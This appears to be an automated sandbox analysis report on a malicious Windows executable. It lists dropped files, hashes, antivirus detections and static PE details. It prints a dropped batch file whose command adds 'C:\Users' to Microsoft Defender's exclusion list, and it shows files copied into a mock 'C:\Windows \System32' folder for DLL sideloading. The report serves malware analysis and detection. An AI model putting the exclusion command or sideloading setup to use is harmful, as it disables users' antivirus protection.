                                                                                          Process:C:\Users\user\Desktop\0vJrK0NCd1.exe
                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):111405
                                                                                          Entropy (8bit):5.052109520887475
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:XljNHW+IID3TTy6Xt8amsy1o865jd5w8DdD05Cl7MbiRHRYQ+b:XJxW+j/N8ago865w8DdD0wRYQ+b
                                                                                          MD5:8B1A7AE864B2F2A73BEFA4BE3485C6B3
                                                                                          SHA1:F0448250682FC5E5C2E5A0D1EDEA52BB048D82FD
                                                                                          SHA-256:29B4242225DD417C42B54B995F9DA6BBAC9DACEA35F6E8DB91BFC4E4BE74921F
                                                                                          SHA-512:647394D7B55A96FEF96FBD1C1D3BE5E34EFC57F45D375BCDF4BD49E9CA9CA8D3C131D1BB73DC5A31F0BFC526189DBDB7BBC2EC7E1BB0012782E6664CD4890FF6
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                                          Reputation:unknown
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....z.d.P..v......!..........................<a............................. ......qS........ .................................................P............P..................\........................... ...(.......................X............................................................... .P`........P....0....... ..............@.P..............@......."..............@.P@.............P.......(..............@.0@.............`.......,..............@.0@.............p........................p.....................................@.0@........P............0..............@.0.........X............8..............@.@.........h............:..............@.`.........\............<..............@.0B/4...................>..............@.PB/19..................B..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):1292
                                                                                          Entropy (8bit):5.357150301903567
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:3WPpQdo4KAxX5qRP6hTppoVZL9t3UqKuHKJRSF8PQ9uM:GPei4nqRSXufL9tkq9HaR48Y9uM
                                                                                          MD5:FEE027B129F0D3E81ECADDA460E6D063
                                                                                          SHA1:9BA4F2687F191ABFE0D5A692377E9F065365F4A4
                                                                                          SHA-256:B4532680A7BFCA99C9353D8DEB73108FA77849CD4BE1265351D06B230A3A6236
                                                                                          SHA-512:F4C995FB859644913AA9426533785D2122715D65079B864853A39754FEAF6271F3D260005C2BB742447463ACAE44F314817EF284C67C64A42673E97074E40397
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview:@...e...............................7................@..........8....................@.Z:.h...........System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0................UW...F.}*.A..x........System..4...............A{....L..-............System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<.....................N...>m..>........System.Management...@...............$TRE..&D.#.t.c%A........System.DirectoryServices4................ .v'#-N....M..d........System.Xml..4...............A.....A....'.b.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<..................ASG...M-.?.........System.Transactions.<.................hr..B.....w.O........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D.....................G..H.).7.........System.Configuration.Ins

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bhdysabz.ssh.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview:1

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jygeob4o.kex.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview:1

                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):6205
                                                                                          Entropy (8bit):3.7658948055088
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:In2zRqCRN51UhkvhkvCCtbFswhHS/swhHSO:DRLxcxsn
                                                                                          MD5:49389849949996BDB90C2E91B4EED2E4
                                                                                          SHA1:CF2204BB87FFFE11C90735E8EA3992EB29991A49
                                                                                          SHA-256:7BE1393A7C2C50E1FB0F1716FF6F7B6360277455CADA732DA4381C9B3D93842D
                                                                                          SHA-512:E54A835FCDD490D53CD10E22A9E586CC93A909F2DB71D3482A06C1A61DDED1C6CB14E3204D43DDA912ED4DF45660528956BCC143497CCC4164FCE881BD59F7FF
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview:...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-....Ip.....w..2.......t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..W.......Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..W.......Y....................D1,.R.o.a.m.i.n.g.....\.1......U...MICROS~1..D.......Ny..W.......Y....................b5..M.i.c.r.o.s.o.f.t.....V.1......W....Windows.@.......Ny..W.......Y......................~.W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..W.......Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......W...Programs..j.......Ny..W.......Y..............@......K..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny..Wt......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........

                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RBNLKJ6D6L2MH5SJFZ5V.temp

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):6205
                                                                                          Entropy (8bit):3.7658948055088
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:In2zRqCRN51UhkvhkvCCtbFswhHS/swhHSO:DRLxcxsn
                                                                                          MD5:49389849949996BDB90C2E91B4EED2E4
                                                                                          SHA1:CF2204BB87FFFE11C90735E8EA3992EB29991A49
                                                                                          SHA-256:7BE1393A7C2C50E1FB0F1716FF6F7B6360277455CADA732DA4381C9B3D93842D
                                                                                          SHA-512:E54A835FCDD490D53CD10E22A9E586CC93A909F2DB71D3482A06C1A61DDED1C6CB14E3204D43DDA912ED4DF45660528956BCC143497CCC4164FCE881BD59F7FF
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview:...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-....Ip.....w..2.......t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..W.......Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..W.......Y....................D1,.R.o.a.m.i.n.g.....\.1......U...MICROS~1..D.......Ny..W.......Y....................b5..M.i.c.r.o.s.o.f.t.....V.1......W....Windows.@.......Ny..W.......Y......................~.W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..W.......Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......W...Programs..j.......Ny..W.......Y..............@......K..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny..Wt......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........

                                                                                          C:\Windows \System32\KDECO.bat

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):152
                                                                                          Entropy (8bit):4.694584085826828
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:pLACpr5LJJLNyMhQQNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OAn:pLXrznyiMMQ75ieGgdEYlRA/An
                                                                                          MD5:7E5FBD29557A68383DFB34E696964E93
                                                                                          SHA1:C1F748F89B47864301255D1FB2BFED04ED0D1300
                                                                                          SHA-256:4E55B1BBE2E0E099592AC57A747FA8D4EF67409901D6C64323A1B73D50E5DE67
                                                                                          SHA-512:7DCB6582B03E7BF0CAB2168DC775CA6D7A15EBB097FD2CDD3445B6D35EE128386FB9AA6A548B745C32540E358B2AA4D7C78A6F59F85C32065735FC54A6A2BB6A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview:cmd.exe /c start /min powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit..

                                                                                          C:\Windows \System32\easinvoker.exe

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):131648
                                                                                          Entropy (8bit):5.225468064273746
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
                                                                                          MD5:231CE1E1D7D98B44371FFFF407D68B59
                                                                                          SHA1:25510D0F6353DBF0C9F72FC880DE7585E34B28FF
                                                                                          SHA-256:30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                                                                                          SHA-512:520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Reputation:unknown
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

                                                                                          C:\Windows \System32\netutils.dll

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):111405
                                                                                          Entropy (8bit):5.052109520887475
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:XljNHW+IID3TTy6Xt8amsy1o865jd5w8DdD05Cl7MbiRHRYQ+b:XJxW+j/N8ago865w8DdD0wRYQ+b
                                                                                          MD5:8B1A7AE864B2F2A73BEFA4BE3485C6B3
                                                                                          SHA1:F0448250682FC5E5C2E5A0D1EDEA52BB048D82FD
                                                                                          SHA-256:29B4242225DD417C42B54B995F9DA6BBAC9DACEA35F6E8DB91BFC4E4BE74921F
                                                                                          SHA-512:647394D7B55A96FEF96FBD1C1D3BE5E34EFC57F45D375BCDF4BD49E9CA9CA8D3C131D1BB73DC5A31F0BFC526189DBDB7BBC2EC7E1BB0012782E6664CD4890FF6
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                                          Reputation:unknown
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....z.d.P..v......!..........................<a............................. ......qS........ .................................................P............P..................\........................... ...(.......................X............................................................... .P`........P....0....... ..............@.P..............@......."..............@.P@.............P.......(..............@.0@.............`.......,..............@.0@.............p........................p.....................................@.0@........P............0..............@.0.........X............8..............@.@.........h............:..............@.`.........\............<..............@.0B/4...................>..............@.PB/19..................B..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

                                                                                          \Device\Null

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\PING.EXE
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):527
                                                                                          Entropy (8bit):4.93002924277763
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:PKMRJpTeTeTeTeTeT0sF7n+AFSkIrxMVlmJHaVzvv:/naD+AokItULVDv
                                                                                          MD5:1E4493508EB6B3891A6134F6719B8CFF
                                                                                          SHA1:5945034284D72C4F0513510A51F5667D2D14E65F
                                                                                          SHA-256:5153D49A8705C8621F4DAA72287BE931D2D34346E4984EFB4B572CEDD95DA4AC
                                                                                          SHA-512:5BF0B241EA0136A901EA0AA15D194ECA23B83C4C7586278097E20443A8D775F250FED7614CFDA37CB7171CE73512C4855E924E4AE35BE16150DDEC9AB8FC9649
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 6, Received = 6, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):7.419554531680892
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                                          • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                                          • Windows Screen Saver (13104/52) 0.13%
                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          File name:0vJrK0NCd1.exe
                                                                                          File size:1'131'463 bytes
                                                                                          MD5:533b3df0e597c50e1129ec807fd6bbcf
                                                                                          SHA1:0561fc6471cb5e2f0aa9e6b3e3fdfa9fd2586dbc
                                                                                          SHA256:8bf8b980381fd607ec9065bfbcd572973770ee77c815354a35455c10651516d5
                                                                                          SHA512:0bb3a148e72a30f4bf5aad8f27aa8ca1f8ca2ee36e498c395a5ac8091f3bfd9ece8cb6430881eae79a30a077b90f3f1d565833f303017ec01ee806c819bc4cd6
                                                                                          SSDEEP:24576:+9PSlSUTC5lG8L14BQG/AWgbPmEqE5pLixE7pnrEH7T:+9PUZT2d14aGoTlnp52
                                                                                          TLSH:F935D016A17885BBD1E30E34F84E6394951B7E391F38384365D2BD8DBA3E681B52C783
                                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                          File Icon

                                                                                          Icon Hash:71f9919286b2a1a5

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x460464
                                                                                          Entrypoint Section:CODE
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                          DLL Characteristics:
                                                                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:eeb6f210c31e51d5b63be371278c03a3

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          jmp 00007FF02CC25861h
                                                                                          mov eax, 004601C4h
                                                                                          call 00007FF02CBDD06Dh
                                                                                          mov eax, dword ptr [004EBB1Ch]
                                                                                          mov eax, dword ptr [eax]
                                                                                          call 00007FF02CC28975h
                                                                                          mov ecx, dword ptr [004EBC14h]
                                                                                          mov eax, dword ptr [004EBB1Ch]
                                                                                          mov eax, dword ptr [eax]
                                                                                          mov edx, dword ptr [0045FF04h]
                                                                                          call 00007FF02CC28975h
                                                                                          mov eax, dword ptr [004EBB1Ch]
                                                                                          mov eax, dword ptr [eax]
                                                                                          call 00007FF02CC289E9h
                                                                                          call 00007FF02CBDAC90h
                                                                                          lea eax, dword ptr [eax+00h]
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xed0000x232c.idata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xf90000xd600.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0xf10000x18.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          CODE0x10000x5f4ac0x5f600False0.5256773222477065data6.542264285948502IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          DATA0x610000x8acb40x8ae00False0.666159780040504data7.527713167200616IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          BSS0xec0000xd150x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .idata0xed0000x232c0x2400False0.3628472222222222data4.971041857999194IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .tls0xf00000x100x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .rdata0xf10000x180x200False0.05078125data0.15842690200323517IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                          .reloc0xf20000x6c0c0x6e00False0.6440340909090909data6.682368392261621IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0xf90000xd6000xd600False0.1875data3.9582855006976745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_CURSOR0xf9e980x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                          RT_CURSOR0xf9fcc0x134data0.4642857142857143
                                                                                          RT_CURSOR0xfa1000x134data0.4805194805194805
                                                                                          RT_CURSOR0xfa2340x134data0.38311688311688313
                                                                                          RT_CURSOR0xfa3680x134data0.36038961038961037
                                                                                          RT_CURSOR0xfa49c0x134data0.4090909090909091
                                                                                          RT_CURSOR0xfa5d00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                          RT_BITMAP0xfa7040x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                          RT_BITMAP0xfa8d40x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                          RT_BITMAP0xfaab80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                          RT_BITMAP0xfac880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                          RT_BITMAP0xfae580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                          RT_BITMAP0xfb0280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                          RT_BITMAP0xfb1f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                          RT_BITMAP0xfb3c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                          RT_BITMAP0xfb5980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                          RT_BITMAP0xfb7680x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                          RT_BITMAP0xfb9380xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors0.5208333333333334
                                                                                          RT_BITMAP0xfb9f80xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.42857142857142855
                                                                                          RT_BITMAP0xfbad80xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.4955357142857143
                                                                                          RT_BITMAP0xfbbb80xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.38392857142857145
                                                                                          RT_BITMAP0xfbc980xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors0.4947916666666667
                                                                                          RT_BITMAP0xfbd580xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors0.484375
                                                                                          RT_BITMAP0xfbe180xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.42410714285714285
                                                                                          RT_BITMAP0xfbef80xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors0.5104166666666666
                                                                                          RT_BITMAP0xfbfb80xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.5
                                                                                          RT_BITMAP0xfc0980xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                          RT_BITMAP0xfc1800xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors0.4895833333333333
                                                                                          RT_BITMAP0xfc2400xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.3794642857142857
                                                                                          RT_ICON0xfc3200x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.2355595667870036
                                                                                          RT_ICON0xfcbc80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.2805299539170507
                                                                                          RT_ICON0xfd2900x3a48Device independent bitmap graphic, 60 x 120 x 32, image size 148800.052815013404825736
                                                                                          RT_ICON0x100cd80x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 67200.09186390532544379
                                                                                          RT_ICON0x1027400x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.20081967213114754
                                                                                          RT_ICON0x1030c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.3182624113475177
                                                                                          RT_DIALOG0x1035300x52data0.7682926829268293
                                                                                          RT_STRING0x1035840x308data0.43943298969072164
                                                                                          RT_STRING0x10388c0x1f0data0.4213709677419355
                                                                                          RT_STRING0x103a7c0x1c0data0.44419642857142855
                                                                                          RT_STRING0x103c3c0xdcdata0.6
                                                                                          RT_STRING0x103d180x2f4data0.4497354497354497
                                                                                          RT_STRING0x10400c0xdcdata0.5863636363636363
                                                                                          RT_STRING0x1040e80x10cdata0.5746268656716418
                                                                                          RT_STRING0x1041f40x33cdata0.4311594202898551
                                                                                          RT_STRING0x1045300x3d4data0.3683673469387755
                                                                                          RT_STRING0x1049040x3a4data0.34763948497854075
                                                                                          RT_STRING0x104ca80x3e8data0.384
                                                                                          RT_STRING0x1050900xf4data0.47540983606557374
                                                                                          RT_STRING0x1051840xc4data0.5663265306122449
                                                                                          RT_STRING0x1052480x2c0data0.4446022727272727
                                                                                          RT_STRING0x1055080x478data0.2928321678321678
                                                                                          RT_STRING0x1059800x3acdata0.37553191489361704
                                                                                          RT_STRING0x105d2c0x2d4data0.4046961325966851
                                                                                          RT_RCDATA0x1060000x10data1.5
                                                                                          RT_RCDATA0x1060100x368data0.6938073394495413
                                                                                          RT_RCDATA0x1063780x129Delphi compiled form 'TForm1'0.7878787878787878
                                                                                          RT_GROUP_CURSOR0x1064a40x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                          RT_GROUP_CURSOR0x1064b80x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                          RT_GROUP_CURSOR0x1064cc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                          RT_GROUP_CURSOR0x1064e00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                          RT_GROUP_CURSOR0x1064f40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                          RT_GROUP_CURSOR0x1065080x14Lotus unknown worksheet or configuration, revision 0x11.3
